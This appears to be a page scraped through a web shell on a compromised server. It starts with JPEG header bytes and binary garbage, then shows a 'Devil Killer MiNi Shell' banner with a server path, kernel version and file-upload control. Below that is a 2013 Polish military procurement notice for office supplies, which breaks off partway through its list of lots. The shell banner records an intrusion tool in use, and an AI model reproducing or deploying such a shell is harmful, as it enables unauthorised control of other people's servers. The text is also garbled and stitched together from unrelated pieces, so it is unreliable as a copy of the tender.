JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131025/436136-N-2013.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów biurowych, druków, kalendarzy oraz ram i gablot 
dla Jednostki Wojskowej Nr 6021 w Warszawie 
oraz jednostek organizacyjnych będących na jej zaopatrzeniu.
Sprawa nr 82/2013/PN/SZK</b><br>
<b>Numer ogłoszenia: 436136 - 2013; data zamieszczenia: 25.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 6021 , ul. Żwirki i Wigury 9/13, 00-909 Warszawa, woj. mazowieckie, tel. 22 684 75 81, faks 22 684 75 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.Ozgst.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych, druków, kalendarzy oraz ram i gablot 
dla Jednostki Wojskowej Nr 6021 w Warszawie 
oraz jednostek organizacyjnych będących na jej zaopatrzeniu.
Sprawa nr 82/2013/PN/SZK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Dostawa artykułów biurowych, druków, kalendarzy oraz ram i gablot dla Jednostki Wojskowej Nr 6021 oraz jednostek organizacyjnych będących na jej zaopatrzeniu.
ZAMAWIAJĄCY dopuszcza składanie ofert częściowych, z podziałem na niżej wymienione części: (szczegółowy opis przedmiotu zamówienia):
1.	CZĘŚĆ I - artykuły biurowe, koperty, kalendarze dla Batalionu Reprezentacyjnego WP szczegółowy opis w Załączniku Nr 1a) do SIWZ;
2.	CZĘŚĆ II  - artykuły biurowe dla Orkiestry Wojskowej w Warszawie, szczegółowy opis w Załączniku Nr 1b) do SIWZ;
3.	CZĘŚĆ III - artykuły biurowe dla JW Nr 6021 szczegółowy opis w Załączniku Nr 1c) do SIWZ.;  
4.	CZĘŚĆ IV - druki dla JW Nr 6021 szczegółowy opis w Załączniku Nr 1d) do SIWZ;
5.	CZĘŚĆ V - kalendarze dla JW Nr 2414 szczegółowy opis w Załączniku Nr 1e)  do SIWZ;
6.	CZĘŚĆ VI - ramy dla JW Nr 2414 szczegółowy opis w Załączniku Nr 1f) do SIWZ;
7.	CZĘŚĆ VII - gabloty dla Batalionu Reprezentacyjnego WP szczegółowy opis w Załączniku  Nr 1g) do SIWZ;
8.	CZĘŚĆ VIII - teczki okolicznościowe dla Batalionu Reprezentacyjnego WP szczegółowy opis w Załączniku Nr 1h) do SIWZ;
9.	CZĘŚĆ IX - papier fotograficzny dla JW Nr 2420 szczegółowy opis w Załączniku Nr 1i) do SIWZ.
10.	CZĘŚĆ X - Artykuły biurowe dla JW. 2414 szczegółowy opis w Załączniku Nr 1j) do SIWZ.
11.	CZĘŚĆ XI - Artykuły biurowe II dla JW. 6021 szczegółowy opis w Załączniku Nr 1k) do SIWZ.
12.	CZĘŚĆ XII - Stojak Reklamowy dla BRWP szczegółowy opis w Załączniku Nr 1l) do SIWZ.
13.	CZĘŚĆ XIII - dostawa tablic dla JW. Nr 6021 szczegółowy opis w Załączniku Nr 1ł) do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.92.30-1, 30.19.76.30-1, 30.19.00.00-7, 30.19.00.00-7, 30.19.97.92-8, 44.14.20.00-7, 39.15.41.00-7, 22.99.31.00-8, 37.53.34.00-7, 30.19.50.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Na potwierdzenie powyższego warunku WYKONAWCA składa oświadczenie zgodnie z Rozdziałem VI ust. 1 pkt 1) SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dot. III. 5) ZAMAWIAJĄCY wymaga, aby WYKONAWCA załączył do oferty w przypadku zaproponowania asortymentu równoważnego:
1.	materiały informacyjne - katalogi, prospekty, zawierające informacje potwierdzające spełnienie wymaganych przez Zamawiającego parametrów użytkowych,

WYKONAWCA może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach 
zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, 
niezależnie od charakteru prawnego łączących go z nimi stosunków. WYKONAWCA w 
takiej sytuacji zobowiązany jest udowodnić ZAMAWIAJĄCEMU, iż będzie dysponował 
zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu 
pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów 
na okres korzystania z nich przy wykonywaniu zamówienia. W zakresie potwierdzenia 
okoliczności, o których mowa w Rozdziale V pkt 3 SIWZ - należy przedłożyć pisemne 
oświadczenie zawierające zobowiązanie wskazanych podmiotów do oddania 
WYKONAWCY do dyspozycji niezbędnych zasobów na okres korzystania z nich przy 
wykonywaniu zamówienia. Treść zobowiązania powinna określać: kto jest podmiotem 
przyjmującym zasoby, zakres zobowiązania podmiotu trzeciego, czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie ono wykonane, w tym jakiego okresu dotyczy. W 
sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich 
udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez 
zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać 
wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia. Jeżeli 
WYKONAWCA ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej 
Polskiej, zamiast dokumentów, o których mowa w ust. 2 pkt 2) składa on dokument lub 
dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w 
miejscu zamieszkania osoby lub w kraju, w którym WYKONAWCA ma siedzibę lub miejsce 
zamieszkania nie wydaje się dokumentów, o których mowa powyżej zastępuje się je 
dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem 
sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
odpowiednio miejsca zamieszkania osoby lub kraju, w którym WYKONAWCA ma siedzibę 
lub miejsce zamieszkania. W przypadku wątpliwości, co do treści dokumentu złożonego 
przez WYKONAWCĘ mającego siedzibę lub miejsce zamieszkania poza terytorium 
Rzeczypospolitej Polskiej, ZAMAWIAJĄCY może zwrócić się do właściwych organów 
odpowiednio miejsca zamieszkania osoby lub kraju, w którym WYKONAWCA ma siedzibę 
lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących 
przedłożonego dokumentu. W przypadku wątpliwości, co do treści dokumentu złożonego 
przez WYKONAWCĘ mającego siedzibę lub miejsce zamieszkania poza terytorium 
Rzeczpospolitej Polskiej, ZAMAWIAJĄCY może zwrócić się do właściwych organów 
odpowiednio miejsca zamieszkania osoby lub kraju, w którym WYKONAWCA ma siedzibę 
lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących 
przedłożonego dokumentu. W przypadku WYKONAWCÓW ubiegających się wspólnie o 
zamówienie publiczne zastosowanie ma art. 23 ustawy PZP. 1) WYKONAWCY wspólnie 
ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w 
postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy (lider konsorcjum). 
Pełnomocnictwo należy dołączyć do oferty. 2) W związku z faktem, iż wszelka 
korespondencja związana z postępowaniem będzie kierowana do ustanowionego przez 
WYKONAWCÓW pełnomocnika należy podać adres pełnomocnika (lidera konsorcjum), na 
jaki ma być wysyłana korespondencja. 3) Pełnomocnictwo dla ustanowionego pełnomocnika 
(lidera konsorcjum) powinno jednoznacznie wskazywać pełnomocnika, określać zakres 
pełnomocnictwa oraz termin jego ważności, a także precyzować postępowanie, do którego się 
odnosi. Musi też wskazywać wszystkich WYKONAWCÓW wspólnie ubiegających się o 
zamówienie i być podpisane przez każdego z nich. 4) W przypadku WYKONAWCÓW 
wspólnie ubiegających się o udzielenie zamówienia oświadczenie o spełnieniu warunków 
dotyczących udziału w postępowaniu WYKONAWCY składają łącznie (załącznik Nr 3 do 
SIWZ), oświadczenie o braku podstaw do wykluczenia z postępowania (załącznik Nr 4 do 
SIWZ) oraz Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w 
art. 24 ust. 2 pkt 5 ustawy PZP (załącznik Nr 5 do SIWZ) składa każdy uczestnik 
Konsorcjum. Każdy uczestnik Konsorcjum składa aktualny odpis z właściwego rejestru lub z 
centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy 
wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia 
w oparciu o art. 24 ust. 1 pkt 2 ustawy PZP, wystawionego nie wcześniej niż 6 miesięcy przed 
upływem terminu składania ofert. Jeżeli oferta WYKONAWCÓW wspólnie ubiegających się 
o udzielenie zamówienia zostanie wybrana, ZAMAWIAJĄCY może żądać przed zawarciem 
umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych 
WYKONAWCÓW. Oferta składana przez Spółki cywilne, ustawowo zdefiniowane w art. 860 oraz w art. 864 Kodeksu cywilnego (Dz. U. z 1964 r. Nr 16, poz. 93 ze zm.) zgodnie z art. 4 
ust. 2 ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej (Dz. U. z 2004 r. 
Nr 173, poz. 1807 ze zm.) jest traktowana, jako oferta WYKONAWCÓW wspólnie 
ubiegających się o udzielenie zamówienia publicznego (art. 23 ustawy PZP) i solidarnie za 
nie odpowiadających. Pełnomocnictwo musi być złożone w oryginale albo w formie kopii 
poświadczonej notarialnie. Jeżeli oferta podpisana jest przez pełnomocnika, do oferty należy 
dołączyć dokument pełnomocnictwa, z którego będzie wynikało umocowanie pełnomocnika 
do złożenia oferty (należy przez to rozumieć osobę umocowaną prawnie do składania 
oświadczeń woli w imieniu WYKONAWCY, z zastrzeżeniem art. 106 Kodeksu cywilnego 
przy właściwości podmiotowej określonej w ustawie o Krajowym Rejestrze Sądowym oraz z 
zastrzeżeniem art. 95 i nast. Kodeksu cywilnego dla podmiotów podlegających wpisowi do 
Centralnej Ewidencji i Informacji o Działalności Gospodarczej (art. 14 ust. 2 ustawy z dnia 2 
lipca 2004 r. o swobodzie działalności gospodarczej - j.t. Dz. U. Nr. z 2010 r., Nr 220, poz. 
1447, z późn. zm.). Ocena spełniania wyżej wymienionych warunków dokonana zostanie 
zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i 
oświadczeniach.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ozgst.wp.mil.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie 
ZAMAWIAJĄCEGO - Warszawa, ul. Żwirki i Wigury 9/13, budynek Nr 511, pokój 3 w 
godzinach od 8.00 do 15.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2013 godzina 11:00, miejsce: Siedziba ZAMAWIAJĄCEGO - Warszawa, ul. 
Żwirki i Wigury 9/13, budynek Nr 21, Kancelaria Jednostki od poniedziałku do piątku w 
godzinach od 8.00 do 10.00 i od 13.00 do 15.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły biurowe, koperty, kalendarze dla Batalionu Reprezentacyjnego WP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku Nr 1a) do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.92.30-1, 30.19.76.30-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Artykuły biurowe dla Orkiestry Wojskowej w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku Nr 1b) do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Artykuły biurowe dla JW Nr 6021.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku Nr 1c) do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Druki dla JW Nr 6021.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku Nr 1d) do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kalendarze dla JW Nr 2414.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku Nr 1e)  do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.92-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ramy dla JW Nr 2414.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku Nr 1f) do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.14.20.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Gabloty dla Batalionu Reprezentacyjnego WP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku  Nr 1g) do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.41.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Teczki okolicznościowe dla Batalionu Reprezentacyjnego WP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku Nr 1h) do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Papier fotograficzny dla JW Nr 2420.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku Nr 1i) do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.99.31.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Artykuły biurowe dla JW. 2414.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku Nr 1j) do SIWZ.</p></li>
